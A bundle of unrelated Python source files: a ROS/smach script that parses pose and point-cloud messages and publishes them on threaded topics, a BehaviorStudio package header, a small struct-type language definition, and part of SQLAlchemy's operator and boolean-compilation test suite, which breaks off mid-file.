posearray = PoseArray()
for pose in posearray_input:
try:
assert isinstance(pose, Pose)
posearray.poses.append(pose)
continue
except:
pass
try:
assert isinstance(pose, PoseStamped)
posearray.poses.append(pose.pose)
continue
except:
pass
try:
position = Point(x=pose[0][0], y=pose[0][1], z=pose[0][2])
orientation = Quaternion(x=pose[1][0], y=pose[1][1], z=pose[1][2], w=pose[1][3])
pose = Pose(position=position, orientation=orientation)
posearray.poses.append(pose)
continue
except Exception as e:
raise ValueError('Pose in pose array input not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
posearray.header.stamp = rospy.Time.now()
return posearray
except Exception as e:
raise ValueError('Pose array not properly specified (should be PoseArray or list of Pose, PoseStamped or [[3],[4]] list types)!')
def parse_pointcloud(pointcloud_input):
"""
Parse pointcloud_input into PointCloud.
"""
try:
assert isinstance(pointcloud_input, PointCloud)
return pointcloud_input
except:
pass
try:
points = pc2.read_points(pointcloud_input, skip_nans=True, field_names=('x', 'y', 'z'))
return PointCloud(points = map(lambda point: Point32(*point), points))
except Exception as e:
raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type): ' + repr(e))
def parse_pointcloud2(pointcloud_input):
"""
Parse pointcloud_input into PointCloud2.
"""
try:
assert isinstance(pointcloud_input, PointCloud2)
return pointcloud_input
except:
pass
try:
points = [[point.x, point.y, point.z] for point in pointcloud_input.points]
pointcloud2 = create_cloud_xyz32(header=pointcloud_input.header, points=points)
return pointcloud2
except:
raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type)!')
class MsgPublisher(object):
"""
"""
def __init__(self):
# A dict of message publishers indexed by topic
self._pubs = dict()
# A dict of messages indexed by topic
self._msgs = dict()
# A dict of callbacks indexed by topic
self._callbacks = dict()
# A dict of message publication rates indexed by topic
self._pub_rates = dict()
# A dict of message publisher threads indexed by topic
self._pub_threads = dict()
# A dict of message publisher stop flags indexed by topic
self._stop_flags = dict()
# Length of timeout (in seconds) for waiting for the threads to finish
# publishing before forcibly unpublishing.
self._unpublish_timeout = 10.0
def _run_pub_thread(self, topic):
r = rospy.Rate(self._pub_rates[topic])
while not self._stop_flags[topic]:
# Apply callback to message
if self._callbacks[topic]:
try:
self._msgs[topic] = self._callbacks[topic](self._msgs[topic])
except Exception as e:
rospy.logerr('Error when applying callback to message being published on topic {}: {}'.format(topic, repr(e)))
# Publish message
try:
self._pubs[topic].publish(self._msgs[topic])
except Exception as e:
rospy.logerr('Error while publishing to topic {}: {}'.format(topic, repr(e)))
r.sleep()
self._unpublish(topic)
def _unpublish(self, topic):
try:
self._pubs[topic].unregister()
except Exception as e:
rospy.logerr('Failed to unregister publisher of topic {}: {}'.format(topic, repr(e)))
raise
del self._pubs[topic]
del self._msgs[topic]
del self._callbacks[topic]
del self._pub_rates[topic]
def start(self, msg, topic, rate, frame_id=None, callback=None):
# Set the message publisher stopping flag
self._stop_flags[topic] = False
# Save the message
self._msgs[topic] = msg
# Save the message publication rate
self._pub_rates[topic] = rate
# Use frame_id if specified
if frame_id:
try:
assert(isinstance(frame_id, str))
self._msgs[topic].header.frame_id = frame_id
except:
rospy.logwarn('Failed to add specified frame_id {} to message for publication on topic {}: {}'.format(frame_id, topic, repr(e)))
# Use callback if specified
if callback:
try:
assert(callable(callback))
self._callbacks[topic] = callback
except:
rospy.logwarn('Failed to add specified callback {} to publisher of topic {}: {}'.format(callback, topic, repr(e)))
self._callbacks[topic] = None
else:
self._callbacks[topic] = None
# Add publisher
try:
self._pubs[topic] = rospy.Publisher(topic, type(self._msgs[topic]))
except Exception as e:
del self._pub_rates[topic]
self._msgs[topic]
rospy.logwarn('Failed to add publisher for topic {}: {}'.format(topic, repr(e)))
return 'aborted'
# Spin up the message publication thread
self._pub_threads[topic] = threading.Thread(target=self._run_pub_thread, args=[topic])
self._pub_threads[topic].start()
return 'succeeded'
def stop(self, topic):
# Signal thread to stop publishing
self._stop_flags[topic] = True
# Wait for the topic to be unpublished
t = rospy.get_time()
r = rospy.Rate(self._pub_rates[topic])
while topic in list(self._pubs.keys()):
if rospy.get_time() - t < self._unpublish_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the publisher is still running, issue a warning and attempt forced unpublish.
rospy.logwarn('Warning: timeout exceeded for stopping publisher thread for topic {}. Attempting forced stop...'.format(topic))
try:
self._unpublish(topic)
except Exception as e:
rospy.logerr('Error during forced stop of publisher of topic {}: {}'.format(topic, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
# Stop all current publishers
for topic in self._pubs.keys():
if self.stop(topic) != 'succeeded':
return 'aborted'
return 'succeeded'
class PublishMsgState(smach.State):
def __init__(self, name, msg_publisher, action, input_keys = ['msg', 'topic', 'rate'], output_keys = ['msg', 'topic'], callbacks = None):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
# Save the state name
self._name = name
# Save the MsgPublisherObserver object reference
self._msg_publisher = msg_publisher
# Save the action
self._action = action
# Set up dict of parsing functions for certain message types/classes.
self._msg_parsers = {"<class 'geometry_msgs.msg._Point.Point'>": parse_pointstamped,
"<class 'geometry_msgs.msg._PointStamped.PointStamped'>": parse_pointstamped,
"<class 'geometry_msgs.msg._Pose.Pose'>": parse_posestamped,
"<class 'geometry_msgs.msg._PoseStamped.PoseStamped'>": parse_posestamped,
"<class 'geometry_msgs.msg._PoseArray.PoseArray'>": parse_posearray,
"<class 'sensor_msgs.msg._PointCloud.PointCloud'>": parse_pointcloud,
"<class 'sensor_msgs.msg._PointCloud2.PointCloud2'>": parse_pointcloud2}
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def _parse_msg(self, msg, msg_type=None):
# First try using a known parser for a specified msg_type.
try:
assert msg_type
msg_class = str(roslib.message.get_message_class(msg_type))
published_msg = self._msg_parsers[msg_class](msg)
return published_msg
except:
pass
# Next, try to select a known parser by checking the type of message.
try:
msg_class = str(type(msg))
published_msg = self._msg_parsers[msg_class](msg)
return published_msg
except:
pass
# Next, try each message type parser in succession and see if something sticks.
for _, parser in self._msg_parsers.items():
try:
published_msg = parser(msg)
return published_msg
except:
pass
# Finally, if none of the above stuck, just return the original message.
return msg
def execute(self, userdata):
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
# Start or stop the message publisher
outcome = 'aborted'
if self._action == 'start':
# Parse msg
try:
if 'msg_type' in self._input_keys:
published_msg = self._parse_msg(userdata.msg, msg_type=userdata.msg_type)
else:
published_msg = self._parse_msg(userdata.msg)
except Exception as e:
rospy.logerr('Failed to parse message: '.format(repr(e)))
return 'aborted'
# Get topic if it's specified as an input key
if 'topic' in self._input_keys:
topic = userdata.topic
# Otherwise, construct it from the state name
else:
topic = 'smacha/' + self._name.lower()
# Get rate if it's specified as an input key
if 'rate' in self._input_keys:
rate = userdata.rate
else:
rate = 100.0
# Get callback if it's specified as an input key
if 'callback' in self._input_keys:
callback = userdata.callback
else:
callback = ''
# Get frame_id if it's specified as an input key
if 'frame_id' in self._input_keys:
frame_id = userdata.frame_id
else:
frame_id = ''
# Start the publisher
outcome = self._msg_publisher.start(published_msg, topic, rate, frame_id=frame_id, callback=callback)
elif self._action == 'stop':
outcome = self._msg_publisher.stop(topic)
elif self._action == 'stop_all':
outcome = self._msg_publisher.stop_all()
# Set topic output key if specified
if self._action == 'start' and outcome == 'succeeded':
for output_key in ['topic', 'output_topic', 'topic_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, topic)
# Set msg output key if specified
if self._action == 'start' and outcome == 'succeeded':
for output_key in ['msg', 'output_msg', 'msg_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, published_msg)
return outcome
class SleepState(smach.State):
def __init__(self, time, input_keys = [], output_keys = [], callbacks = [], outcomes=['succeeded']):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=outcomes)
self._time = time
def execute(self, userdata):
rospy.sleep(self._time)
return 'succeeded'
def main():
rospy.init_node('sm')
msg_publisher = MsgPublisher()
sm = smach.StateMachine(outcomes=['succeeded', 'aborted'])
sm.userdata.rate = 100.0
sm.userdata.rate = 100.0
sm.userdata.topic = ''
sm.userdata.point = Point()
sm.userdata.rate = 100.0
sm.userdata.topic = 'smacha/rosbag_recording_1_point'
with sm:
smach.StateMachine.add('PUBLISH_MSG',
PublishMsgState('PUBLISH_MSG', msg_publisher, 'start'),
transitions={'aborted':'aborted',
'succeeded':'WAIT'},
remapping={'msg':'point',
'rate':'rate',
'topic':'topic'})
smach.StateMachine.add('WAIT',
SleepState(10),
transitions={'succeeded':'UNPUBLISH_MSG'})
smach.StateMachine.add('UNPUBLISH_MSG',
PublishMsgState('UNPUBLISH_MSG', msg_publisher, 'stop_all'),
transitions={'aborted':'aborted',
'succeeded':'succeeded'})
outcome = sm.execute()
if __name__ == '__main__':
main()
|
# coding=utf-8
# -----------------
# file : __init__.py
# date : 2012/11/03
# author : Victor Zarubkin
# contact : [email protected]
# copyright : Copyright (C) 2012 Victor Zarubkin
# license : This file is part of BehaviorStudio.
# :
# : BehaviorStudio is free software: you can redistribute it and/or modify
# : it under the terms of the GNU General Public License as published by
# : the Free Software Foundation, either version 3 of the License, or
# : (at your option) any later version.
# :
# : BehaviorStudio is distributed in the hope that it will be useful,
# : but WITHOUT ANY WARRANTY; without even the implied warranty of
# : MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# : GNU General Public License for more details.
# :
# : You should have received a copy of the GNU General Public License
# : along with BehaviorStudio. If not, see <http://www.gnu.org/licenses/>.
# :
# : A copy of the GNU General Public License can be found in file COPYING.
############################################################################
__author__ = 'Victor Zarubkin'
__copyright__ = 'Copyright (C) 2012 Victor Zarubkin'
__credits__ = ['Victor Zarubkin']
__license__ = ['GPLv3']
__version__ = '1.0.0' # this is last application version when this script file was changed
__email__ = '[email protected]'
|
# this thing still needs some refining
from base import Constant, StructType
Ref = StructType(u"ref:name")
## appear only in Field.spec
List = StructType(u"list:spec")
String = Constant(u"string")
Buffer = Constant(u"buffer")
## Appears only in Struct.fields
Object = StructType(u"object:name:spec")
StructDecl = StructType(u"struct:name:objects")
GroupDecl = StructType(u"group:name:members")
ConstDecl = StructType(u"constant:name")
Language = StructType(u"language:name:types")
language = Language(u'language', [
StructDecl(u"ref", [
Object(u"name", [String])
]),
StructDecl(u"list", [
Object(u"spec", [List([Ref(u"ref")])])
]),
ConstDecl(u"string"),
ConstDecl(u"buffer"),
StructDecl(u"object", [
Object(u"name", [String]),
Object(u"spec", [List([Ref(u"string"), Ref(u"buffer"), Ref(u"list"), Ref(u"ref")])]),
]),
StructDecl(u"struct", [
Object(u"name", [String]),
Object(u"objects", [List([Ref(u"object")])])
]),
StructDecl(u"group", [
Object(u"name", [String]),
Object(u"members", [List([Ref(u"ref")])])
]),
StructDecl(u"constant", [
Object(u"name", [String]),
]),
StructDecl(u"language", [
Object(u"name", [String]),
Object(u"types", [List([Ref(u"constant"), Ref(u"group"), Ref(u"struct")])]),
]),
])
class Synthetizer(object):
def __init__(self, language):
self.table = {}
for obj in language.types:
if obj.type == StructDecl:
uid = obj.name + u':' + u':'.join(_obj.name for _obj in obj.objects)
self.table[obj.name] = StructType(uid)
elif obj.type == ConstDecl:
self.table[obj.name] = Constant(obj.name)
def __getitem__(self, name):
return self.table[name]
|
from sqlalchemy.testing import fixtures, eq_, is_, is_not_
from sqlalchemy import testing
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.sql import column, desc, asc, literal, collate, null, \
true, false, any_, all_
from sqlalchemy.sql.expression import BinaryExpression, \
ClauseList, Grouping, \
UnaryExpression, select, union, func, tuple_
from sqlalchemy.sql import operators, table
import operator
from sqlalchemy import String, Integer, LargeBinary
from sqlalchemy import exc
from sqlalchemy.engine import default
from sqlalchemy.sql.elements import _literal_as_text
from sqlalchemy.schema import Column, Table, MetaData
from sqlalchemy.sql import compiler
from sqlalchemy.types import TypeEngine, TypeDecorator, UserDefinedType, \
Boolean, NullType, MatchType, Indexable, Concatenable, Array
from sqlalchemy.dialects import mysql, firebird, postgresql, oracle, \
sqlite, mssql
from sqlalchemy import util
import datetime
import collections
from sqlalchemy import text, literal_column
from sqlalchemy import and_, not_, between, or_
class LoopOperate(operators.ColumnOperators):
def operate(self, op, *other, **kwargs):
return op
class DefaultColumnComparatorTest(fixtures.TestBase):
def _do_scalar_test(self, operator, compare_to):
left = column('left')
assert left.comparator.operate(operator).compare(
compare_to(left)
)
self._loop_test(operator)
def _do_operate_test(self, operator, right=column('right')):
left = column('left')
assert left.comparator.operate(
operator,
right).compare(
BinaryExpression(
_literal_as_text(left),
_literal_as_text(right),
operator))
assert operator(
left,
right).compare(
BinaryExpression(
_literal_as_text(left),
_literal_as_text(right),
operator))
self._loop_test(operator, right)
def _loop_test(self, operator, *arg):
l = LoopOperate()
is_(
operator(l, *arg),
operator
)
def test_desc(self):
self._do_scalar_test(operators.desc_op, desc)
def test_asc(self):
self._do_scalar_test(operators.asc_op, asc)
def test_plus(self):
self._do_operate_test(operators.add)
def test_is_null(self):
self._do_operate_test(operators.is_, None)
def test_isnot_null(self):
self._do_operate_test(operators.isnot, None)
def test_is_null_const(self):
self._do_operate_test(operators.is_, null())
def test_is_true_const(self):
self._do_operate_test(operators.is_, true())
def test_is_false_const(self):
self._do_operate_test(operators.is_, false())
def test_equals_true(self):
self._do_operate_test(operators.eq, True)
def test_notequals_true(self):
self._do_operate_test(operators.ne, True)
def test_is_true(self):
self._do_operate_test(operators.is_, True)
def test_isnot_true(self):
self._do_operate_test(operators.isnot, True)
def test_is_false(self):
self._do_operate_test(operators.is_, False)
def test_isnot_false(self):
self._do_operate_test(operators.isnot, False)
def test_like(self):
self._do_operate_test(operators.like_op)
def test_notlike(self):
self._do_operate_test(operators.notlike_op)
def test_ilike(self):
self._do_operate_test(operators.ilike_op)
def test_notilike(self):
self._do_operate_test(operators.notilike_op)
def test_is(self):
self._do_operate_test(operators.is_)
def test_isnot(self):
self._do_operate_test(operators.isnot)
def test_no_getitem(self):
assert_raises_message(
NotImplementedError,
"Operator 'getitem' is not supported on this expression",
self._do_operate_test, operators.getitem
)
assert_raises_message(
NotImplementedError,
"Operator 'getitem' is not supported on this expression",
lambda: column('left')[3]
)
def test_in(self):
left = column('left')
assert left.comparator.operate(operators.in_op, [1, 2, 3]).compare(
BinaryExpression(
left,
Grouping(ClauseList(
literal(1), literal(2), literal(3)
)),
operators.in_op
)
)
self._loop_test(operators.in_op, [1, 2, 3])
def test_notin(self):
left = column('left')
assert left.comparator.operate(operators.notin_op, [1, 2, 3]).compare(
BinaryExpression(
left,
Grouping(ClauseList(
literal(1), literal(2), literal(3)
)),
operators.notin_op
)
)
self._loop_test(operators.notin_op, [1, 2, 3])
def test_in_no_accept_list_of_non_column_element(self):
left = column('left')
foo = ClauseList()
assert_raises_message(
exc.InvalidRequestError,
r"in_\(\) accepts either a list of expressions or a selectable:",
left.in_, [foo]
)
def test_in_no_accept_non_list_non_selectable(self):
left = column('left')
right = column('right')
assert_raises_message(
exc.InvalidRequestError,
r"in_\(\) accepts either a list of expressions or a selectable:",
left.in_, right
)
def test_in_no_accept_non_list_thing_with_getitem(self):
# test [ticket:2726]
class HasGetitem(String):
class comparator_factory(String.Comparator):
def __getitem__(self, value):
return value
left = column('left')
right = column('right', HasGetitem)
assert_raises_message(
exc.InvalidRequestError,
r"in_\(\) accepts either a list of expressions or a selectable:",
left.in_, right
)
def test_collate(self):
left = column('left')
right = "some collation"
left.comparator.operate(operators.collate, right).compare(
collate(left, right)
)
def test_concat(self):
self._do_operate_test(operators.concat_op)
def test_default_adapt(self):
class TypeOne(TypeEngine):
pass
class TypeTwo(TypeEngine):
pass
expr = column('x', TypeOne()) - column('y', TypeTwo())
is_(
expr.type._type_affinity, TypeOne
)
def test_concatenable_adapt(self):
class TypeOne(Concatenable, TypeEngine):
pass
class TypeTwo(Concatenable, TypeEngine):
pass
class TypeThree(TypeEngine):
pass
expr = column('x', TypeOne()) - column('y', TypeTwo())
is_(
expr.type._type_affinity, TypeOne
)
is_(
expr.operator, operator.sub
)
expr = column('x', TypeOne()) + column('y', TypeTwo())
is_(
expr.type._type_affinity, TypeOne
)
is_(
expr.operator, operators.concat_op
)
expr = column('x', TypeOne()) - column('y', TypeThree())
is_(
expr.type._type_affinity, TypeOne
)
is_(
expr.operator, operator.sub
)
expr = column('x', TypeOne()) + column('y', TypeThree())
is_(
expr.type._type_affinity, TypeOne
)
is_(
expr.operator, operator.add
)
class CustomUnaryOperatorTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
def _factorial_fixture(self):
class MyInteger(Integer):
class comparator_factory(Integer.Comparator):
def factorial(self):
return UnaryExpression(self.expr,
modifier=operators.custom_op("!"),
type_=MyInteger)
def factorial_prefix(self):
return UnaryExpression(self.expr,
operator=operators.custom_op("!!"),
type_=MyInteger)
def __invert__(self):
return UnaryExpression(self.expr,
operator=operators.custom_op("!!!"),
type_=MyInteger)
return MyInteger
def test_factorial(self):
col = column('somecol', self._factorial_fixture())
self.assert_compile(
col.factorial(),
"somecol !"
)
def test_double_factorial(self):
col = column('somecol', self._factorial_fixture())
self.assert_compile(
col.factorial().factorial(),
"somecol ! !"
)
def test_factorial_prefix(self):
col = column('somecol', self._factorial_fixture())
self.assert_compile(
col.factorial_prefix(),
"!! somecol"
)
def test_factorial_invert(self):
col = column('somecol', self._factorial_fixture())
self.assert_compile(
~col,
"!!! somecol"
)
def test_double_factorial_invert(self):
col = column('somecol', self._factorial_fixture())
self.assert_compile(
~(~col),
"!!! (!!! somecol)"
)
def test_unary_no_ops(self):
assert_raises_message(
exc.CompileError,
"Unary expression has no operator or modifier",
UnaryExpression(literal("x")).compile
)
def test_unary_both_ops(self):
assert_raises_message(
exc.CompileError,
"Unary expression does not support operator and "
"modifier simultaneously",
UnaryExpression(literal("x"),
operator=operators.custom_op("x"),
modifier=operators.custom_op("y")).compile
)
class _CustomComparatorTests(object):
def test_override_builtin(self):
c1 = Column('foo', self._add_override_factory())
self._assert_add_override(c1)
def test_column_proxy(self):
t = Table('t', MetaData(),
Column('foo', self._add_override_factory())
)
proxied = t.select().c.foo
self._assert_add_override(proxied)
self._assert_and_override(proxied)
def test_alias_proxy(self):
t = Table('t', MetaData(),
Column('foo', self._add_override_factory())
)
proxied = t.alias().c.foo
self._assert_add_override(proxied)
self._assert_and_override(proxied)
def test_binary_propagate(self):
c1 = Column('foo', self._add_override_factory())
self._assert_add_override(c1 - 6)
self._assert_and_override(c1 - 6)
def test_reverse_binary_propagate(self):
c1 = Column('foo', self._add_override_factory())
self._assert_add_override(6 - c1)
self._assert_and_override(6 - c1)
def test_binary_multi_propagate(self):
c1 = Column('foo', self._add_override_factory())
self._assert_add_override((c1 - 6) + 5)
self._assert_and_override((c1 - 6) + 5)
def test_no_boolean_propagate(self):
c1 = Column('foo', self._add_override_factory())
self._assert_not_add_override(c1 == 56)
self._assert_not_and_override(c1 == 56)
def _assert_and_override(self, expr):
assert (expr & text("5")).compare(
expr.op("goofy_and")(text("5"))
)
def _assert_add_override(self, expr):
assert (expr + 5).compare(
expr.op("goofy")(5)
)
def _assert_not_add_override(self, expr):
assert not (expr + 5).compare(
expr.op("goofy")(5)
)
def _assert_not_and_override(self, expr):
assert not (expr & text("5")).compare(
expr.op("goofy_and")(text("5"))
)
class CustomComparatorTest(_CustomComparatorTests, fixtures.TestBase):
def _add_override_factory(self):
class MyInteger(Integer):
class comparator_factory(TypeEngine.Comparator):
def __init__(self, expr):
super(MyInteger.comparator_factory, self).__init__(expr)
def __add__(self, other):
return self.expr.op("goofy")(other)
def __and__(self, other):
return self.expr.op("goofy_and")(other)
return MyInteger
class TypeDecoratorComparatorTest(_CustomComparatorTests, fixtures.TestBase):
def _add_override_factory(self):
class MyInteger(TypeDecorator):
impl = Integer
class comparator_factory(TypeDecorator.Comparator):
def __init__(self, expr):
super(MyInteger.comparator_factory, self).__init__(expr)
def __add__(self, other):
return self.expr.op("goofy")(other)
def __and__(self, other):
return self.expr.op("goofy_and")(other)
return MyInteger
class TypeDecoratorTypeDecoratorComparatorTest(
_CustomComparatorTests, fixtures.TestBase):
def _add_override_factory(self):
class MyIntegerOne(TypeDecorator):
impl = Integer
class comparator_factory(TypeDecorator.Comparator):
def __init__(self, expr):
super(MyIntegerOne.comparator_factory, self).__init__(expr)
def __add__(self, other):
return self.expr.op("goofy")(other)
def __and__(self, other):
return self.expr.op("goofy_and")(other)
class MyIntegerTwo(TypeDecorator):
impl = MyIntegerOne
return MyIntegerTwo
class TypeDecoratorWVariantComparatorTest(
_CustomComparatorTests,
fixtures.TestBase):
def _add_override_factory(self):
class SomeOtherInteger(Integer):
class comparator_factory(TypeEngine.Comparator):
def __init__(self, expr):
super(
SomeOtherInteger.comparator_factory,
self).__init__(expr)
def __add__(self, other):
return self.expr.op("not goofy")(other)
def __and__(self, other):
return self.expr.op("not goofy_and")(other)
class MyInteger(TypeDecorator):
impl = Integer
class comparator_factory(TypeDecorator.Comparator):
def __init__(self, expr):
super(MyInteger.comparator_factory, self).__init__(expr)
def __add__(self, other):
return self.expr.op("goofy")(other)
def __and__(self, other):
return self.expr.op("goofy_and")(other)
return MyInteger().with_variant(SomeOtherInteger, "mysql")
class CustomEmbeddedinTypeDecoratorTest(
_CustomComparatorTests,
fixtures.TestBase):
def _add_override_factory(self):
class MyInteger(Integer):
class comparator_factory(TypeEngine.Comparator):
def __init__(self, expr):
super(MyInteger.comparator_factory, self).__init__(expr)
def __add__(self, other):
return self.expr.op("goofy")(other)
def __and__(self, other):
return self.expr.op("goofy_and")(other)
class MyDecInteger(TypeDecorator):
impl = MyInteger
return MyDecInteger
class NewOperatorTest(_CustomComparatorTests, fixtures.TestBase):
def _add_override_factory(self):
class MyInteger(Integer):
class comparator_factory(TypeEngine.Comparator):
def __init__(self, expr):
super(MyInteger.comparator_factory, self).__init__(expr)
def foob(self, other):
return self.expr.op("foob")(other)
return MyInteger
def _assert_add_override(self, expr):
assert (expr.foob(5)).compare(
expr.op("foob")(5)
)
def _assert_not_add_override(self, expr):
assert not hasattr(expr, "foob")
def _assert_and_override(self, expr):
pass
def _assert_not_and_override(self, expr):
pass
class ExtensionOperatorTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
def test_contains(self):
class MyType(UserDefinedType):
class comparator_factory(UserDefinedType.Comparator):
def contains(self, other, **kw):
return self.op("->")(other)
self.assert_compile(
Column('x', MyType()).contains(5),
"x -> :x_1"
)
def test_getitem(self):
class MyType(UserDefinedType):
class comparator_factory(UserDefinedType.Comparator):
def __getitem__(self, index):
return self.op("->")(index)
self.assert_compile(
Column('x', MyType())[5],
"x -> :x_1"
)
def test_op_not_an_iterator(self):
# see [ticket:2726]
class MyType(UserDefinedType):
class comparator_factory(UserDefinedType.Comparator):
def __getitem__(self, index):
return self.op("->")(index)
col = Column('x', MyType())
assert not isinstance(col, collections.Iterable)
def test_lshift(self):
class MyType(UserDefinedType):
class comparator_factory(UserDefinedType.Comparator):
def __lshift__(self, other):
return self.op("->")(other)
self.assert_compile(
Column('x', MyType()) << 5,
"x -> :x_1"
)
def test_rshift(self):
class MyType(UserDefinedType):
class comparator_factory(UserDefinedType.Comparator):
def __rshift__(self, other):
return self.op("->")(other)
self.assert_compile(
Column('x', MyType()) >> 5,
"x -> :x_1"
)
class IndexableTest(fixtures.TestBase, testing.AssertsCompiledSQL):
def setUp(self):
class MyTypeCompiler(compiler.GenericTypeCompiler):
def visit_mytype(self, type, **kw):
return "MYTYPE"
def visit_myothertype(self, type, **kw):
return "MYOTHERTYPE"
class MyCompiler(compiler.SQLCompiler):
def visit_slice(self, element, **kw):
return "%s:%s" % (
self.process(element.start, **kw),
self.process(element.stop, **kw),
)
def visit_getitem_binary(self, binary, operator, **kw):
return "%s[%s]" % (
self.process(binary.left, **kw),
self.process(binary.right, **kw)
)
class MyDialect(default.DefaultDialect):
statement_compiler = MyCompiler
type_compiler = MyTypeCompiler
class MyType(Indexable, TypeEngine):
__visit_name__ = 'mytype'
def __init__(self, zero_indexes=False, dimensions=1):
if zero_indexes:
self.zero_indexes = zero_indexes
self.dimensions = dimensions
class Comparator(Indexable.Comparator):
def _setup_getitem(self, index):
if isinstance(index, slice):
return_type = self.type
elif self.type.dimensions is None or \
self.type.dimensions == 1:
return_type = Integer()
else:
adapt_kw = {'dimensions': self.type.dimensions - 1}
# this is also testing the behavior of adapt()
# that we can pass kw that override constructor kws.
# required a small change to util.constructor_copy().
return_type = self.type.adapt(
self.type.__class__, **adapt_kw)
return operators.getitem, index, return_type
comparator_factory = Comparator
self.MyType = MyType
self.__dialect__ = MyDialect()
def test_setup_getitem_w_dims(self):
"""test the behavior of the _setup_getitem() method given a simple
'dimensions' scheme - this is identical to postgresql.ARRAY."""
col = Column('x', self.MyType(dimensions=3))
is_(
col[5].type._type_affinity, self.MyType
)
eq_(
col[5].type.dimensions, 2
)
is_(
col[5][6].type._type_affinity, self.MyType
)
eq_(
col[5][6].type.dimensions, 1
)
is_(
col[5][6][7].type._type_affinity, Integer
)
def test_getindex_literal(self):
col = Column('x', self.MyType())
self.assert_compile(
col[5],
"x[:x_1]",
checkparams={'x_1': 5}
)
def test_getindex_sqlexpr(self):
col = Column('x', self.MyType())
col2 = Column('y', Integer())
self.assert_compile(
col[col2],
"x[y]",
checkparams={}
)
self.assert_compile(
col[col2 + 8],
"x[(y + :y_1)]",
checkparams={'y_1': 8}
)
def test_getslice_literal(self):
col = Column('x', self.MyType())
self.assert_compile(
col[5:6],
"x[:x_1::x_2]",
checkparams={'x_1': 5, 'x_2': 6}
)
def test_getslice_sqlexpr(self):
col = Column('x', self.MyType())
col2 = Column('y', Integer())
self.assert_compile(
col[col2:col2 + 5],
"x[y:y + :y_1]",
checkparams={'y_1': 5}
)
def test_getindex_literal_zeroind(self):
col = Column('x', self.MyType(zero_indexes=True))
self.assert_compile(
col[5],
"x[:x_1]",
checkparams={'x_1': 6}
)
def test_getindex_sqlexpr_zeroind(self):
col = Column('x', self.MyType(zero_indexes=True))
col2 = Column('y', Integer())
self.assert_compile(
col[col2],
"x[(y + :y_1)]",
checkparams={'y_1': 1}
)
self.assert_compile(
col[col2 + 8],
"x[(y + :y_1 + :param_1)]",
checkparams={'y_1': 8, 'param_1': 1}
)
def test_getslice_literal_zeroind(self):
col = Column('x', self.MyType(zero_indexes=True))
self.assert_compile(
col[5:6],
"x[:x_1::x_2]",
checkparams={'x_1': 6, 'x_2': 7}
)
def test_getslice_sqlexpr_zeroind(self):
col = Column('x', self.MyType(zero_indexes=True))
col2 = Column('y', Integer())
self.assert_compile(
col[col2:col2 + 5],
"x[y + :y_1:y + :y_2 + :param_1]",
checkparams={'y_1': 1, 'y_2': 5, 'param_1': 1}
)
def test_override_operators(self):
special_index_op = operators.custom_op('->')
class MyOtherType(Indexable, TypeEngine):
__visit_name__ = 'myothertype'
class Comparator(TypeEngine.Comparator):
def _adapt_expression(self, op, other_comparator):
return special_index_op, MyOtherType()
comparator_factory = Comparator
col = Column('x', MyOtherType())
self.assert_compile(
col[5],
"x -> :x_1",
checkparams={'x_1': 5}
)
class BooleanEvalTest(fixtures.TestBase, testing.AssertsCompiledSQL):
"""test standalone booleans being wrapped in an AsBoolean, as well
as true/false compilation."""
def _dialect(self, native_boolean):
d = default.DefaultDialect()
d.supports_native_boolean = native_boolean
return d
def test_one(self):
c = column('x', Boolean)
self.assert_compile(
select([c]).where(c),
"SELECT x WHERE x",
dialect=self._dialect(True)
)
def test_two_a(self):
c = column('x', Boolean)
self.assert_compile(
select([c]).where(c),
"SELECT x WHERE x = 1",
dialect=self._dialect(False)
)
def test_two_b(self):
c = column('x', Boolean)
self.assert_compile(
select([c], whereclause=c),
"SELECT x WHERE x = 1",
dialect=self._dialect(False)
)
def test_three_a(self):
c = column('x', Boolean)
self.assert_compile(
select([c]).where(~c),
"SELECT x WHERE x = 0",
dialect=self._dialect(False)
)
def test_three_b(self):
c = column('x', Boolean)
self.assert_compile(
select([c], whereclause=~c),
"SELECT x WHERE x = 0",
dialect=self._dialect(False)
)
def test_four(self):
c = column('x', Boolean)
self.assert_compile(
select([c]).where(~c),
"SELECT x WHERE NOT x",
dialect=self._dialect(True)
)
def test_five_a(self):
c = column('x', Boolean)
self.assert_compile(
select([c]).having(c),
"SELECT x HAVING x = 1",
dialect=self._dialect(False)
)
def test_five_b(self):
c = column('x', Boolean)
self.assert_compile(
select([c], having=c),
"SELECT x HAVING x = 1",
dialect=self._dialect(False)
)
def test_six(self):
self.assert_compile(
or_(false(), true()),
"1 = 1",
dialect=self._dialect(False)
)
def test_eight(self):
self.assert_compile(
and_(false(), true()),
"false",
dialect=self._dialect(True)
)
def test_nine(self):
self.assert_compile(
and_(false(), true()),
"0 = 1",
dialect=self._dialect(False)
)
def test_ten(self):
c = column('x', Boolean)
self.assert_compile(
c == 1,
"x = :x_1",
dialect=self._dialect(False)
)
def test_eleven(self):
